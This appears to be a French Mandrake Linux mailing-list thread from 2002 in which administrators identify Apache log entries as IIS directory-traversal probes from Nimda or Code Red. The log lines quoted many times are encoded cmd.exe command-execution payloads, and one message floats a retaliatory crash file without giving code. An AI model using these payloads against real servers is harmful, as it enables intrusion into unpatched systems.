et si on cree betement un fichier qui recherche et qui ferait planter le client, ca pourrait etre bien! Personne n'as d'idee comment le concevoir... -Message d'origine- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]De la part de Bruno Pinaud Envoyé : lundi, 14. janvier 2002 10:23 À : [EMAIL PROTECTED]; [EMAIL PROTECTED] Objet : Re: [Confirme] Attaque d'Apache ? Le fichier est dans /var/log/httpd/error.log pour les erreurs et access.log pour le reste. Perso, j'ai tellement d'attaque de ce genre, que je n'y fait même plus attention. J'ai juste des logs relativement gros en comparaison du traffic sur mon serveur. Le Lundi 14 Janvier 2002 09:59, alain siani a écrit : > pouvez vous me dire quel est le fichier de log de apache ou l'on trouve > cela ? Merci ! > Alain > > Le Lundi 14 Janvier 2002 09:49, vous avez ?rit : > > > J'ai eu le meme pb avec exactement les memes logs sur mon apache > > > provenant > > > > d'un rigolo de Wanadoo sur Paris. > > > > Je pense qu'une bonne plainte serait une bonne chose. > > Wanadoo a un mail a disposition pour transmettre les pb de ce genre (voir > > la hot line de Wanadoo pour avoir le mail en question). > > > > Christian RAGUET. > > > > > > -Message d'origine- > > De: Denis Bergeron [mailto:[EMAIL PROTECTED]] > > Date: lundi 14 janvier 2002 02:18 > > À: [EMAIL PROTECTED] > > Objet: Re: [Confirme] Attaque d'Apache ? > > > > > > C'est une attaque, il essaye d'exécuter le programme "root.exe" "cmd" .. > > qui > > > > justement donne l'équivalent du accès telnet root sur IIS, mais c'est des > > vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a > > pris des trucs de l'an passée et qui sait pas faire la différence avec > > apache et IIS... au pire, tu peux (en fait tu devrais) faire un recherche > > du propriétaire de l'adresse et faire une plainte officielle à son ISP > > (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe > > le compte de ce genre de personne après trois plainte.s > > > > -Denis > > > > Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : > > > Bonsoir, > > > > > > Les logs d'Apache ci-dessous montrent que des tentatives de recherches > > > de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont > > > celles de France-Télécom. > > > Ce serveur n'était pas censé fournir des pages sur Internet mais > > > seulement en intranet. Il était ouvert sur l'extérieur à des fins de > > > tests. Depuis, je l'ai verrouillé et en ai profité pour installer > > > Bastille. > > > > > > Pour mon information personnelle, s'agit-il d'une tentative d'attaque > > > ou d'une requête normale de FT (je doute) ? > > > > > > Merci pour vos lumières. > > > > > > AF > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] "GET > > > /scripts/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] "GET > > > /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] "GET > > > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] "GET > > > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] "GET > > > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" > > > "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] "GET > > > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > > > > HTTP/ > > > > > 1.0" 404 339 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] "GET > > > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > > > > HTTP/ > > > > > 1.0" 404 339 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] "GET > > > > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt > >/s > > > > > ystem32/cmd.exe?/c+dir HTTP/1.0" 404
Re: [Confirme] Attaque d'Apache ?
c'est un ver je pense genre code red >C'est une attaque, il essaye d'exécuter le programme "root.exe" "cmd" .. qui >justement donne l'équivalent du accès telnet root sur IIS, mais c'est des >vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a pris >des trucs de l'an passée et qui sait pas faire la différence avec apache et >IIS... au pire, tu peux (en fait tu devrais) faire un recherche du >propriétaire de l'adresse et faire une plainte officielle à son ISP (FAI)... >Au Canada, la plupart des founisseurs d'accès à Internet coupe le compte de >ce genre de personne après trois plainte.s > >-Denis > >Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : >> Bonsoir, >> >> Les logs d'Apache ci-dessous montrent que des tentatives de recherches >> de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont >> celles de France-Télécom. >> Ce serveur n'était pas censé fournir des pages sur Internet mais >> seulement en intranet. Il était ouvert sur l'extérieur à des fins de >> tests. Depuis, je l'ai verrouillé et en ai profité pour installer >> Bastille. >> >> Pour mon information personnelle, s'agit-il d'une tentative d'attaque ou >> d'une requête normale de FT (je doute) ? >> >> Merci pour vos lumières. >> >> AF >> >> 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] "GET >> /scripts/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-" >> >> 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] "GET > > /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 "-" "-" >> >> 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] "GET >> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" >> >> 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] "GET >> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" >> >> 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] "GET >> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" >> >> 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] "GET >> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ >> >> 1.0" 404 339 "-" "-" >> >> 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] "GET >> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ >> >> 1.0" 404 339 "-" "-" >> >> 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] "GET >> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s >> >> ystem32/cmd.exe?/c+dir HTTP/1.0" 404 355 "-" "-" >> >> 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] "GET >> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" >> >> 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] "GET >> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" >> >> 193.253.226.194 - - [11/Jan/2002:21:21:10 +0100] "GET > > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:21:15 +0100] "GET > > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" >> >> 193.253.226.194 - - [11/Jan/2002:21:21:19 +0100] "GET >> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305 "-" "- >> >> " >> >> 193.253.226.194 - - [11/Jan/2002:21:21:30 +0100] "GET >> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305 "-" "-" >> >> 193.253.226.194 - - [11/Jan/2002:21:21:36 +0100] "GET >> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" >> >> "-" >> >> 193.253.226.194 - - [11/Jan/2002:21:21:40 +0100] "GET >> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" > > >Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? >Rendez-vous sur "http://www.mandrakestore.com"; -- Paul Le Secq Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com";
Re: [Confirme] Attaque d'Apache ?
Le fichier est dans /var/log/httpd/error.log pour les erreurs et access.log pour le reste. Perso, j'ai tellement d'attaque de ce genre, que je n'y fait même plus attention. J'ai juste des logs relativement gros en comparaison du traffic sur mon serveur. Le Lundi 14 Janvier 2002 09:59, alain siani a écrit : > pouvez vous me dire quel est le fichier de log de apache ou l'on trouve > cela ? Merci ! > Alain > > Le Lundi 14 Janvier 2002 09:49, vous avez ?rit : > > > J'ai eu le meme pb avec exactement les memes logs sur mon apache > > > provenant > > > > d'un rigolo de Wanadoo sur Paris. > > > > Je pense qu'une bonne plainte serait une bonne chose. > > Wanadoo a un mail a disposition pour transmettre les pb de ce genre (voir > > la hot line de Wanadoo pour avoir le mail en question). > > > > Christian RAGUET. > > > > > > -Message d'origine- > > De: Denis Bergeron [mailto:[EMAIL PROTECTED]] > > Date: lundi 14 janvier 2002 02:18 > > À: [EMAIL PROTECTED] > > Objet: Re: [Confirme] Attaque d'Apache ? > > > > > > C'est une attaque, il essaye d'exécuter le programme "root.exe" "cmd" .. > > qui > > > > justement donne l'équivalent du accès telnet root sur IIS, mais c'est des > > vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a > > pris des trucs de l'an passée et qui sait pas faire la différence avec > > apache et IIS... au pire, tu peux (en fait tu devrais) faire un recherche > > du propriétaire de l'adresse et faire une plainte officielle à son ISP > > (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe > > le compte de ce genre de personne après trois plainte.s > > > > -Denis > > > > Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : > > > Bonsoir, > > > > > > Les logs d'Apache ci-dessous montrent que des tentatives de recherches > > > de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont > > > celles de France-Télécom. > > > Ce serveur n'était pas censé fournir des pages sur Internet mais > > > seulement en intranet. Il était ouvert sur l'extérieur à des fins de > > > tests. Depuis, je l'ai verrouillé et en ai profité pour installer > > > Bastille. > > > > > > Pour mon information personnelle, s'agit-il d'une tentative d'attaque > > > ou d'une requête normale de FT (je doute) ? > > > > > > Merci pour vos lumières. > > > > > > AF > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] "GET > > > /scripts/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] "GET > > > /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] "GET > > > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] "GET > > > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] "GET > > > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" > > > "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] "GET > > > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > > > > HTTP/ > > > > > 1.0" 404 339 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] "GET > > > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > > > > HTTP/ > > > > > 1.0" 404 339 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] "GET > > > > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt > >/s > > > > > ystem32/cmd.exe?/c+dir HTTP/1.0" 404 355 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] "GET > > > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" > > > > "-" > > > > > 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] "GET > > > /scripts/..%c0%2f../winnt/system32/
Re: [Confirme] Attaque d'Apache ?
pouvez vous me dire quel est le fichier de log de apache ou l'on trouve cela ? Merci ! Alain Le Lundi 14 Janvier 2002 09:49, vous avez ?rit : > > J'ai eu le meme pb avec exactement les memes logs sur mon apache provenant > d'un rigolo de Wanadoo sur Paris. > > Je pense qu'une bonne plainte serait une bonne chose. > Wanadoo a un mail a disposition pour transmettre les pb de ce genre (voir > la hot line de Wanadoo pour avoir le mail en question). > > Christian RAGUET. > > > -Message d'origine- > De: Denis Bergeron [mailto:[EMAIL PROTECTED]] > Date: lundi 14 janvier 2002 02:18 > À: [EMAIL PROTECTED] > Objet: Re: [Confirme] Attaque d'Apache ? > > > C'est une attaque, il essaye d'exécuter le programme "root.exe" "cmd" .. > qui > > justement donne l'équivalent du accès telnet root sur IIS, mais c'est des > vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a pris > des trucs de l'an passée et qui sait pas faire la différence avec apache et > IIS... au pire, tu peux (en fait tu devrais) faire un recherche du > propriétaire de l'adresse et faire une plainte officielle à son ISP > (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe le > compte de ce genre de personne après trois plainte.s > > -Denis > > Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : > > Bonsoir, > > > > Les logs d'Apache ci-dessous montrent que des tentatives de recherches > > de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont > > celles de France-Télécom. > > Ce serveur n'était pas censé fournir des pages sur Internet mais > > seulement en intranet. Il était ouvert sur l'extérieur à des fins de > > tests. Depuis, je l'ai verrouillé et en ai profité pour installer > > Bastille. > > > > Pour mon information personnelle, s'agit-il d'une tentative d'attaque ou > > d'une requête normale de FT (je doute) ? > > > > Merci pour vos lumières. > > > > AF > > > > 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] "GET > > /scripts/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] "GET > > /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] "GET > > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] "GET > > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] "GET > > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" > > "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] "GET > > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > > HTTP/ > > > 1.0" 404 339 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] "GET > > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > > HTTP/ > > > 1.0" 404 339 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] "GET > > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s > > > ystem32/cmd.exe?/c+dir HTTP/1.0" 404 355 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] "GET > > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" > > "-" > > > 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] "GET > > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" > > "-" > > > 193.253.226.194 - - [11/Jan/2002:21:21:10 +0100] "GET > > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" > > "-" > > > 193.253.226.194 - - [11/Jan/2002:21:21:15 +0100] "GET > > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" > > "-" > > > 193.253.226.194 - - [11/Jan/2002:21:21:19 +0100] "GET > > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305 "-" > > "- > > > " > > > > 193.253.226.194 - - [11/Jan/2002:21:21:30 +0100] "GET > > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305 "-" > > "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:21:36 +0100] "GET > > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 > > "-" > > > > "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:21:40 +0100] "GET > > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" > > "-" Content-Type: text/plain; charset="iso-8859-1"; name="message.footer" Content-Transfer-Encoding: 8bit Content-Description: -- -- Alain Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com";
RE: [Confirme] Attaque d'Apache ?
J'ai eu le meme pb avec exactement les memes logs sur mon apache provenant d'un rigolo de Wanadoo sur Paris. Je pense qu'une bonne plainte serait une bonne chose. Wanadoo a un mail a disposition pour transmettre les pb de ce genre (voir la hot line de Wanadoo pour avoir le mail en question). Christian RAGUET. -Message d'origine- De: Denis Bergeron [mailto:[EMAIL PROTECTED]] Date: lundi 14 janvier 2002 02:18 À: [EMAIL PROTECTED] Objet: Re: [Confirme] Attaque d'Apache ? C'est une attaque, il essaye d'exécuter le programme "root.exe" "cmd" .. qui justement donne l'équivalent du accès telnet root sur IIS, mais c'est des vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a pris des trucs de l'an passée et qui sait pas faire la différence avec apache et IIS... au pire, tu peux (en fait tu devrais) faire un recherche du propriétaire de l'adresse et faire une plainte officielle à son ISP (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe le compte de ce genre de personne après trois plainte.s -Denis Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : > Bonsoir, > > Les logs d'Apache ci-dessous montrent que des tentatives de recherches > de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont > celles de France-Télécom. > Ce serveur n'était pas censé fournir des pages sur Internet mais > seulement en intranet. Il était ouvert sur l'extérieur à des fins de > tests. Depuis, je l'ai verrouillé et en ai profité pour installer > Bastille. > > Pour mon information personnelle, s'agit-il d'une tentative d'attaque ou > d'une requête normale de FT (je doute) ? > > Merci pour vos lumières. > > AF > > 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] "GET > /scripts/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] "GET > /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] "GET > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] "GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ > > 1.0" 404 339 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] "GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ > > 1.0" 404 339 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] "GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s > > ystem32/cmd.exe?/c+dir HTTP/1.0" 404 355 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] "GET > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:21:10 +0100] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:21:15 +0100] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:21:19 +0100] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305 "-" "- > > " > > 193.253.226.194 - - [11/Jan/2002:21:21:30 +0100] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:21:36 +0100] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" > > "-" > > 193.253.226.194 - - [11/Jan/2002:21:21:40 +0100] "GET > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com";
Re: [Confirme] Attaque d'Apache ?
C'est une attaque, il essaye d'exécuter le programme "root.exe" "cmd" .. qui justement donne l'équivalent du accès telnet root sur IIS, mais c'est des vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a pris des trucs de l'an passée et qui sait pas faire la différence avec apache et IIS... au pire, tu peux (en fait tu devrais) faire un recherche du propriétaire de l'adresse et faire une plainte officielle à son ISP (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe le compte de ce genre de personne après trois plainte.s -Denis Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : > Bonsoir, > > Les logs d'Apache ci-dessous montrent que des tentatives de recherches > de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont > celles de France-Télécom. > Ce serveur n'était pas censé fournir des pages sur Internet mais > seulement en intranet. Il était ouvert sur l'extérieur à des fins de > tests. Depuis, je l'ai verrouillé et en ai profité pour installer > Bastille. > > Pour mon information personnelle, s'agit-il d'une tentative d'attaque ou > d'une requête normale de FT (je doute) ? > > Merci pour vos lumières. > > AF > > 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] "GET > /scripts/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] "GET > /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] "GET > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] "GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ > > 1.0" 404 339 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] "GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ > > 1.0" 404 339 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] "GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s > > ystem32/cmd.exe?/c+dir HTTP/1.0" 404 355 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] "GET > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:21:10 +0100] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:21:15 +0100] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:21:19 +0100] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305 "-" "- > > " > > 193.253.226.194 - - [11/Jan/2002:21:21:30 +0100] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305 "-" "-" > > 193.253.226.194 - - [11/Jan/2002:21:21:36 +0100] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" > > "-" > > 193.253.226.194 - - [11/Jan/2002:21:21:40 +0100] "GET > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com";
RE : [Confirme] Attaque d'Apache ?
cette page qui est sur 193.253.226.194 virus scan detecte W32/Nimda.htm -Message d'origine- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] De la part de Alain F. Envoyé : dimanche 13 janvier 2002 22:58 À : Liste Mdk confirmé Objet : [Confirme] Attaque d'Apache ? Bonsoir, Les logs d'Apache ci-dessous montrent que des tentatives de recherches de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont celles de France-Télécom. Ce serveur n'était pas censé fournir des pages sur Internet mais seulement en intranet. Il était ouvert sur l'extérieur à des fins de tests. Depuis, je l'ai verrouillé et en ai profité pour installer Bastille. Pour mon information personnelle, s'agit-il d'une tentative d'attaque ou d'une requête normale de FT (je doute) ? Merci pour vos lumières. AF 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-" 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 "-" "-" 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0" 404 339 "-" "-" 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0" 404 339 "-" "-" 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn t/s ystem32/cmd.exe?/c+dir HTTP/1.0" 404 355 "-" "-" 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" 193.253.226.194 - - [11/Jan/2002:21:21:10 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" 193.253.226.194 - - [11/Jan/2002:21:21:15 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" 193.253.226.194 - - [11/Jan/2002:21:21:19 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305 "-" "- " 193.253.226.194 - - [11/Jan/2002:21:21:30 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305 "-" "-" 193.253.226.194 - - [11/Jan/2002:21:21:36 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" 193.253.226.194 - - [11/Jan/2002:21:21:40 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com";